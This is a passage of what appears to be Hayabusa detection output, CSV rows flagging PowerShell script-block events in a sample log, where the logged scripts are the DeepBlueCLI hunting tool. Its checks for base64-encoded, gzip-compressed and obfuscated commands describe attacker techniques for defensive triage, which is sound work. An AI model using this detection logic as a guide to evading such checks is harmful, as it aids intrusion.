""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.708 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.714 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.717 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.018 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.018 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.910 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.979 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" 